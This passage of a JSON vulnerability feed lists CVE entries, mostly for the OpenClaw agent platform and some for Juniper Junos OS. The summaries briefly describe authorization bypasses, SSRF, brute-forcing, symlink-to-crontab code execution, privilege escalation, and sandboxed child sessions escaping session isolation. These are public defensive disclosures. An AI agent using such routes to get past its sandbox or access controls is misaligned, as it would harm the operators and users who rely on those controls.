rejection.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":6.9,"epss":0.00053,"ranking_epss":0.16398,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/5e8cb22176e9235e224be0bc530699261eb60e53","https://github.com/openclaw/openclaw/security/advisories/GHSA-3h52-cx59-c456","https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-unauthenticated-webhook-request-parsing"],"published_time":"2026-04-09T22:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35642","summary":"OpenClaw before 2026.3.25 contains an authorization bypass vulnerability where group reaction events bypass the requireMention access control mechanism. 
Attackers can trigger reactions in mention-gated groups to enqueue agent-visible system events that should remain restricted.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":5.3,"epss":0.00025,"ranking_epss":0.06814,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/f8c98630785288cc1f1d0893503ef3b653a3cede","https://github.com/openclaw/openclaw/security/advisories/GHSA-mw7w-g3mg-xqm7","https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-group-reactions-via-requiremention-bypass"],"published_time":"2026-04-09T22:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35644","summary":"OpenClaw before 2026.3.22 contains an information disclosure vulnerability that allows attackers with operator.read scope to expose credentials embedded in channel baseUrl and httpUrl fields. Attackers can access gateway snapshots via config.get and channels.status endpoints to retrieve sensitive authentication information from URL userinfo components.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":7.1,"epss":0.00025,"ranking_epss":0.06809,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/f0202264d0de7ad345382b9008c5963bcefb01b7","https://github.com/openclaw/openclaw/security/advisories/GHSA-ppwq-6v66-5m6j","https://www.vulncheck.com/advisories/openclaw-credential-exposure-via-baseurl-fields-in-gateway-snapshots"],"published_time":"2026-04-09T22:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35632","summary":"OpenClaw through 2026.2.22 contains a symlink traversal vulnerability in agents.create and agents.update handlers that use fs.appendFile on IDENTITY.md without symlink containment checks. 
Attackers with workspace access can plant symlinks to append attacker-controlled content to arbitrary files, enabling remote code execution via crontab injection or unauthorized access via SSH key manipulation.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":6.9,"epss":0.00059,"ranking_epss":0.18485,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/security/advisories/GHSA-7xr2-q9vf-x4r5","https://www.vulncheck.com/advisories/openclaw-symlink-traversal-via-identity-md-appendfile-in-agents-create-update","https://github.com/openclaw/openclaw/security/advisories/GHSA-7xr2-q9vf-x4r5"],"published_time":"2026-04-09T22:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35633","summary":"OpenClaw before 2026.3.22 contains an unbounded memory allocation vulnerability in remote media HTTP error handling that allows attackers to trigger excessive memory consumption. Attackers can send crafted HTTP error responses with large bodies to remote media endpoints, causing the application to allocate unbounded memory before failure handling occurs.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":6.9,"epss":0.00181,"ranking_epss":0.39788,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/81445a901091a5d27ef0b56fceedbe4724566438","https://github.com/openclaw/openclaw/security/advisories/GHSA-4qwc-c7g9-4xcw","https://www.vulncheck.com/advisories/openclaw-unbounded-memory-allocation-via-remote-media-error-responses"],"published_time":"2026-04-09T22:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35634","summary":"OpenClaw before 2026.3.23 contains an authentication bypass vulnerability in the Canvas gateway where authorizeCanvasRequest() unconditionally allows local-direct requests 
without validating bearer tokens or canvas capabilities. Attackers can send unauthenticated loopback HTTP and WebSocket requests to Canvas routes to bypass authentication and gain unauthorized access.","cvss":5.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":5.1,"cvss_v4":5.1,"epss":0.00024,"ranking_epss":0.06577,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/d5dc6b6573ae489bc7e5651090f4767b93537c9e","https://github.com/openclaw/openclaw/security/advisories/GHSA-6mqc-jqh6-x8fc","https://www.vulncheck.com/advisories/openclaw-authentication-bypass-via-local-direct-requests-in-canvas-gateway"],"published_time":"2026-04-09T22:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35635","summary":"OpenClaw before 2026.3.22 contains a webhook path route replacement vulnerability in the Synology Chat extension that allows attackers to collapse multi-account configurations onto shared webhook paths. 
Attackers can exploit inherited or duplicate webhook paths to bypass per-account DM access control policies and replace route ownership across accounts.","cvss":6.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":4.8,"cvss_v4":6.3,"epss":0.00029,"ranking_epss":0.08118,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/980940aa58f862da4e19372597bbc2a9f268d70b","https://github.com/openclaw/openclaw/security/advisories/GHSA-rqp8-q22p-5j9q","https://www.vulncheck.com/advisories/openclaw-webhook-path-route-replacement-vulnerability-in-synology-chat"],"published_time":"2026-04-09T22:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35636","summary":"OpenClaw versions 2026.3.11 through 2026.3.24 contain a session isolation bypass vulnerability where session_status resolves sessionId to canonical session keys before enforcing visibility checks. Sandboxed child sessions can exploit this to access parent or sibling sessions that should be blocked by explicit sessionKey restrictions.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":7.1,"epss":0.00029,"ranking_epss":0.08109,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/d9810811b6c3c9266d7580f00574e5e02f7663de","https://github.com/openclaw/openclaw/security/advisories/GHSA-q2qc-744p-66r2","https://www.vulncheck.com/advisories/openclaw-session-isolation-bypass-via-sessionid-resolution"],"published_time":"2026-04-09T22:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35637","summary":"OpenClaw before 2026.3.22 performs cite expansion before completing channel and DM authorization checks, allowing cite work and content handling prior to final auth decisions. 
Attackers can exploit this timing vulnerability to access or manipulate content before proper authorization validation occurs.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.00042,"ranking_epss":0.12573,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/3cbf932413e41d1836cb91aed1541a28a3122f93","https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/ebee4e2210e1f282a982c7ef2ad79d77a572fc87","https://github.com/openclaw/openclaw/security/advisories/GHSA-vfg3-pqpq-93m4","https://www.vulncheck.com/advisories/openclaw-premature-cite-expansion-before-authorization-in-channel-and-dm"],"published_time":"2026-04-09T22:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35626","summary":"OpenClaw before 2026.3.22 contains an unauthenticated resource exhaustion vulnerability in voice call webhook handling that buffers request bodies before provider signature checks. 
Attackers can send large or malicious webhook requests to exhaust server resources without authentication by bypassing signature validation.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":6.9,"epss":0.00065,"ranking_epss":0.20155,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/651dc7450b68a5396a009db78ef9382633707ead","https://github.com/openclaw/openclaw/security/advisories/GHSA-rm59-992w-x2mv","https://www.vulncheck.com/advisories/openclaw-unauthenticated-resource-exhaustion-via-voice-call-webhook"],"published_time":"2026-04-09T22:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35627","summary":"OpenClaw before 2026.3.22 performs cryptographic and dispatch operations on inbound Nostr direct messages before enforcing sender and pairing policy validation. Attackers can trigger unauthorized pre-authentication computation by sending crafted DM messages, enabling denial of service through resource exhaustion.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":6.9,"epss":0.00082,"ranking_epss":0.24048,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/1ee9611079e81b9122f4bed01abb3d9f56206c77","https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/security/advisories/GHSA-65h8-27jh-q8wv","https://www.vulncheck.com/advisories/openclaw-unauthenticated-cryptographic-work-in-nostr-inbound-dm-handling"],"published_time":"2026-04-09T22:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35628","summary":"OpenClaw before 2026.3.25 contains a missing rate limiting vulnerability in Telegram webhook authentication that allows attackers to brute-force weak webhook secrets. 
The vulnerability enables repeated authentication guesses without throttling, permitting attackers to systematically guess webhook secrets through brute-force attacks.","cvss":6.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":4.8,"cvss_v4":6.3,"epss":0.00038,"ranking_epss":0.11148,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/c2c136ae9517ddd0789d742a0fdf4c10e8c729a7","https://github.com/openclaw/openclaw/security/advisories/GHSA-vcx4-4qxg-mfp4","https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-telegram-webhook-rate-limiting"],"published_time":"2026-04-09T22:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35629","summary":"OpenClaw before 2026.3.25 contains a server-side request forgery vulnerability in multiple channel extensions that fail to properly guard configured base URLs against SSRF attacks. Attackers can exploit unprotected fetch() calls against configured endpoints to rebind requests to blocked internal destinations and access restricted resources.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.4,"cvss_v4":5.3,"epss":0.00034,"ranking_epss":0.09636,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/f92c92515bd439a71bd03eb1bc969c1964f17acf","https://github.com/openclaw/openclaw/security/advisories/GHSA-rhfg-j8jq-7v2h","https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-configured-base-urls-in-channel-extensions"],"published_time":"2026-04-09T22:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35631","summary":"OpenClaw before 2026.3.22 fails to enforce operator.admin scope on mutating internal ACP chat commands, allowing unauthorized modifications. 
Attackers without admin privileges can execute mutating control-plane actions by directly invoking affected ACP commands to bypass authorization gates.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":7.1,"epss":0.00026,"ranking_epss":0.07341,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/229426a257e49694a59fa4e3895861d02a4d767f","https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/security/advisories/GHSA-3w6x-gv34-mqpf","https://www.vulncheck.com/advisories/openclaw-missing-authorization-enforcement-in-internal-acp-chat-commands"],"published_time":"2026-04-09T22:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35618","summary":"OpenClaw before 2026.3.23 contains a replay identity vulnerability in Plivo V2 signature verification that allows attackers to bypass replay protection by modifying query parameters. 
The verification path derives replay keys from the full URL including query strings instead of the canonicalized base URL, enabling attackers to mint new verified request keys through unsigned query-only changes to signed requests.","cvss":8.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":8.3,"epss":0.00028,"ranking_epss":0.07893,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/b0ce53a79cf63834660270513e26d921899b4e5b","https://github.com/openclaw/openclaw/security/advisories/GHSA-cg6c-q2hx-69h7","https://www.vulncheck.com/advisories/openclaw-replay-identity-drift-via-query-only-variants-in-plivo-v2-verification"],"published_time":"2026-04-09T22:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35622","summary":"OpenClaw before 2026.3.22 contains an improper authentication verification vulnerability in Google Chat app-url webhook handling that accepts add-on principals outside intended deployment bindings. 
Attackers can bypass webhook authentication by providing non-deployment add-on principals to execute unauthorized actions through the Google Chat integration.","cvss":6.0,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":5.9,"cvss_v4":6.0,"epss":0.00044,"ranking_epss":0.13199,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66","https://github.com/openclaw/openclaw/security/advisories/GHSA-mp66-rf4f-mhh8","https://www.vulncheck.com/advisories/openclaw-improper-authentication-verification-in-google-chat-webhook"],"published_time":"2026-04-09T22:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35623","summary":"OpenClaw before 2026.3.25 contains a missing rate limiting vulnerability in webhook authentication that allows attackers to brute-force weak webhook passwords without throttling. Remote attackers can repeatedly submit incorrect password guesses to the webhook endpoint to compromise authentication and gain unauthorized access.","cvss":6.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":4.8,"cvss_v4":6.3,"epss":0.00047,"ranking_epss":0.14463,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/5e08ce36d522a1c96df2bfe88e39303ae2643d92","https://github.com/openclaw/openclaw/security/advisories/GHSA-xq8g-hgh6-87hv","https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-webhook-password-rate-limiting"],"published_time":"2026-04-09T22:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35624","summary":"OpenClaw before 2026.3.22 contains a policy confusion vulnerability in room authorization that matches colliding room names instead of stable room tokens. 
Attackers can exploit similarly named rooms to bypass allowlist policies and gain unauthorized access to protected Nextcloud Talk rooms.","cvss":2.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":4.2,"cvss_v4":2.3,"epss":0.0005,"ranking_epss":0.15522,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66","https://github.com/openclaw/openclaw/security/advisories/GHSA-xhq5-45pm-2gjr","https://www.vulncheck.com/advisories/openclaw-policy-confusion-via-room-name-collision-in-nextcloud-talk"],"published_time":"2026-04-09T22:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35625","summary":"OpenClaw before 2026.3.25 contains a privilege escalation vulnerability where silent local shared-auth reconnects auto-approve scope-upgrade requests, widening paired device permissions from operator.read to operator.admin. 
Attackers can exploit this by triggering local reconnection to silently escalate privileges and achieve remote code execution on the node.","cvss":8.5,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":8.5,"epss":0.00033,"ranking_epss":0.09335,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/81ebc7e0344fd19c85778e883bad45e2da972229","https://github.com/openclaw/openclaw/security/advisories/GHSA-fqw4-mph7-2vr8","https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-silent-local-shared-auth-reconnect"],"published_time":"2026-04-09T22:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33791","summary":"An OS Command Injection vulnerability in the CLI processing of Juniper Networks Junos OS and Junos OS Evolved allows a local, high-privileged attacker executing specific, crafted CLI commands to inject arbitrary shell commands as root, leading to a complete compromise of the system.\n\nCertain 'set system' commands, when executed with crafted arguments, are not properly sanitized, allowing for arbitrary shell injection. 
These shell commands are executed as root, potentially allowing for complete control of the vulnerable system.\nThis issue affects:\n\nJunos OS: \n\n\n\n  *  all versions before 22.4R3-S8, \n  *  from 23.2 before 23.2R2-S5, \n  *  from 23.4 before 23.4R2-S7, \n  *  from 24.2 before 24.2R2-S2, \n  *  from 24.4 before 24.4R2, \n  *  from 25.2 before 25.2R2; \n\n\n\n\nJunos OS Evolved: \n\n\n\n  *  all versions before 22.4R3-S8-EVO, \n  *  from 23.2 before 23.2R2-S5-EVO, \n  *  from 23.4 before 23.4R2-S7-EVO, \n  *  from 24.2 before 24.2R2-S2-EVO, \n  *  from 24.4 before 24.4R2-EVO, \n  *  from 25.2 before 25.2R1-S1-EVO, 25.2R2-EVO.","cvss":8.4,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.7,"cvss_v4":8.4,"epss":0.00041,"ranking_epss":0.12443,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://kb.juniper.net/JSA107875"],"published_time":"2026-04-09T22:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33793","summary":"An Execution with Unnecessary Privileges vulnerability in the User Interface (UI) of Juniper Networks Junos OS and Junos OS Evolved allows a local, low-privileged attacker to gain root privileges, thus compromising the system.\n\nWhen a configuration that allows unsigned Python op scripts is present on the device, a non-root user is able to execute malicious op scripts as a root-equivalent user, leading to privilege escalation. 
\n\nThis issue affects Junos OS: \n\n  *  All versions before 22.4R3-S7, \n  *  from 23.2 before 23.2R2-S4, \n  *  from 23.4 before 23.4R2-S6,\n  *  from 24.2 before 24.2R1-S2, 24.2R2, \n  *  from 24.4 before 24.4R1-S2, 24.4R2; \n\n\n\n\nJunos OS Evolved: \n\n\n\n  *  All versions before 22.4R3-S7-EVO, \n  *  from 23.2 before 23.2R2-S4-EVO, \n  *  from 23.4 before 23.4R2-S6-EVO,\n  *  from 24.2 before 24.2R2-EVO, \n  *  from 24.4 before 24.4R1-S1-EVO, 24.4R2-EVO.","cvss":8.5,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":8.5,"epss":0.00014,"ranking_epss":0.0235,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://kb.juniper.net/JSA103142"],"published_time":"2026-04-09T22:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33797","summary":"An Improper Input Validation vulnerability in Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, adjacent attacker sending a specific genuine BGP packet in an already established BGP session to reset only that session, causing a Denial of Service (DoS).\n\nAn attacker repeatedly sending the packet will sustain the Denial of Service (DoS). This issue affects Junos OS:\n\n  *  25.2 versions before 25.2R2\n\n\nThis issue does not affect Junos OS versions before 25.2R1.\n\nThis issue affects Junos OS Evolved: \n  *  25.2-EVO versions before 25.2R2-EVO\n\n\nThis issue does not affect Junos OS Evolved versions before 25.2R1-EVO.\n\neBGP and iBGP are affected.\nIPv4 and IPv6 are affected.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.4,"cvss_v4":7.1,"epss":0.00022,"ranking_epss":0.05889,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://kb.juniper.net/JSA107850"],"published_time":"2026-04-09T22:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34512","summary":"OpenClaw before 2026.3.25 contains an improper access control vulnerability in the HTTP /sessions/:sessionKey/kill 
route that allows any bearer-authenticated user to invoke admin-level session termination functions without proper scope validation. Attackers can exploit this by sending authenticated requests to kill arbitrary subagent sessions via the killSubagentRunAdmin function, bypassing ownership and operator scope restrictions.","cvss":7.2,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.1,"cvss_v4":7.2,"epss":0.00034,"ranking_epss":0.1004,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/02cf12371f9353a16455da01cc02e6c4ecfc4152","https://github.com/openclaw/openclaw/security/advisories/GHSA-9p93-7j67-5pc2","https://www.vulncheck.com/advisories/openclaw-improper-access-control-in-sessions-sessionkey-kill-endpoint"],"published_time":"2026-04-09T22:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35617","summary":"OpenClaw before 2026.3.25 contains an authorization bypass vulnerability in Google Chat group policy enforcement that relies on mutable space display names. 
Attackers can rebind group policies by changing or colliding space display names to gain unauthorized access to protected resources.","cvss":2.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":4.2,"cvss_v4":2.3,"epss":0.00048,"ranking_epss":0.14539,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/11ea1f67863d88b6cbcb229dd368a45e07094bff","https://github.com/openclaw/openclaw/security/advisories/GHSA-52q4-3xjc-6778","https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-group-policy-rebinding-with-mutable-space-displayname"],"published_time":"2026-04-09T22:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33786","summary":"An Improper Check for Unusual or Exceptional Conditions vulnerability in the chassis control daemon (chassisd) of Juniper Networks Junos OS on SRX1600, SRX2300 and SRX4300 allows a local attacker with low privileges to cause a complete Denial of Service (DoS).\n\nWhen a specific 'show chassis' CLI command is executed, chassisd crashes and restarts which causes a momentary impact to all traffic until all modules are online again.\n\nThis issue affects Junos OS on SRX1600, SRX2300 and SRX4300:\n\n\n\n  *  24.4 versions before 24.4R1-S3, 24.4R2.\n\n\nThis issue does not affect Junos OS versions before 24.4R1.","cvss":6.8,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":6.8,"epss":0.00013,"ranking_epss":0.0202,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://kb.juniper.net/JSA107810"],"published_time":"2026-04-09T22:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33787","summary":"An Improper Check for Unusual or Exceptional Conditions vulnerability in the chassis control daemon (chassisd) of Juniper Networks Junos OS on SRX1500, SRX4100, SRX4200 and SRX4600 allows a local attacker with low privileges to cause a complete Denial of Service (DoS).\n\nWhen a specific 'show chassis' 
CLI command is executed, chassisd crashes and restarts which causes a momentary impact to all traffic until all modules are online again.\n\n\n\nThis issue affects Junos OS on SRX1500, SRX4100, SRX4200 and SRX4600: \n\n\n\n  *  23.2 versions before 23.2R2-S6,\n  *  23.4 versions before 23.4R2-S7\n  *  24.2 versions before 24.2R2-S2,\n  *  24.4 versions before 24.4R2,\n  *  25.2 versions before 25.2R1-S1, 25.2R2.","cvss":6.8,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":6.8,"epss":0.00013,"ranking_epss":0.0202,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://kb.juniper.net/JSA107873"],"published_time":"2026-04-09T22:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33788","summary":"A Missing Authentication for Critical Function vulnerability in the Flexible PIC Concentrators (FPCs) of Juniper Networks Junos OS Evolved on PTX Series allows a local, authenticated attacker with low privileges to gain direct access to FPCs installed in the device.\n\nA local user with low privileges can gain direct access to the installed FPCs as a high privileged user, which can potentially lead to a full compromise of the affected component.\n\nThis issue affects Junos OS Evolved on PTX10004, PTX10008, PTX100016, with JNP10K-LC1201 or JNP10K-LC1202:\n\n\n\n\n  *  All versions before 21.2R3-S8-EVO,\n  *  21.4-EVO versions before 21.4R3-S7-EVO,\n  *  22.2-EVO versions before 22.2R3-S4-EVO,\n  *  22.3-EVO versions before 22.3R3-S3-EVO,\n  *  22.4-EVO versions before 22.4R3-S2-EVO,\n  *  23.2-EVO versions before 23.2R2-EVO.","cvss":8.5,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":8.5,"epss":0.00016,"ranking_epss":0.03363,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://kb.juniper.net/JSA107806"],"published_time":"2026-04-09T22:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33790","summary":"An Improper Check for Unusual or Exceptional Conditions 
vulnerability in the flow daemon (flowd) of Juniper Networks Junos OS on SRX Series allows an attacker sending a specific, malformed ICMPv6 packet to cause the srxpfe process to crash and restart. Continued receipt and processing of these packets will repeatedly crash the srxpfe process and sustain the Denial of Service (DoS) condition.\n\nDuring NAT64 translation, receipt of a specific, malformed ICMPv6 packet destined to the device will cause the srxpfe process to crash and restart.\n\nThis issue cannot be triggered using IPv4 or other IPv6 traffic.\n\n\n\nThis issue affects Junos OS on SRX Series:\n  *  all versions before 21.2R3-S10,\n  *  all versions of 21.3,\n  *  from 21.4 before 21.4R3-S12,\n  *  all versions of 22.1,\n  *  from 22.2 before 22.2R3-S8,\n  *  all versions of 22.4,\n  *  from 22.4 before 22.4R3-S9,\n  *  from 23.2 before 23.2R2-S6,\n  *  from 23.4 before 23.4R2-S7,\n  *  from 24.2 before 24.2R2-S3,\n  *  from 24.4 before 24.4R2-S3,\n  *  from 25.2 before 25.2R1-S2, 25.2R2.","cvss":8.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":8.7,"epss":0.0004,"ranking_epss":0.1194,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://kb.juniper.net/JSA107874"],"published_time":"2026-04-09T22:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33781","summary":"An Improper Check for Unusual or Exceptional Conditions vulnerability in the packet forwarding engine (pfe) of Juniper Networks Junos OS on specific EX and QFX Series devices allows an unauthenticated, adjacent attacker to cause a complete Denial of Service (DoS).\n\nOn EX4k and QFX5k platforms configured as service-provider edge devices, if L2PT is enabled on the UNI and VSTP is enabled on the NNI in VXLAN scenarios, receiving VSTP BPDUs on the UNI leads to packet buffer allocation failures, so that the device no longer passes traffic until it is manually recovered with a restart. This issue affects Junos OS:\n\n\n\n  *  24.4 releases 
before 24.4R2,\n  *  25.2 releases before 25.2R1-S1, 25.2R2.\n\n\n\n\nThis issue does not affect Junos OS releases before 24.4R1.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":7.1,"epss":0.00016,"ranking_epss":0.03297,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://kb.juniper.net/JSA107869"],"published_time":"2026-04-09T22:16:27","vendor":null,"product":null,"version":null}]}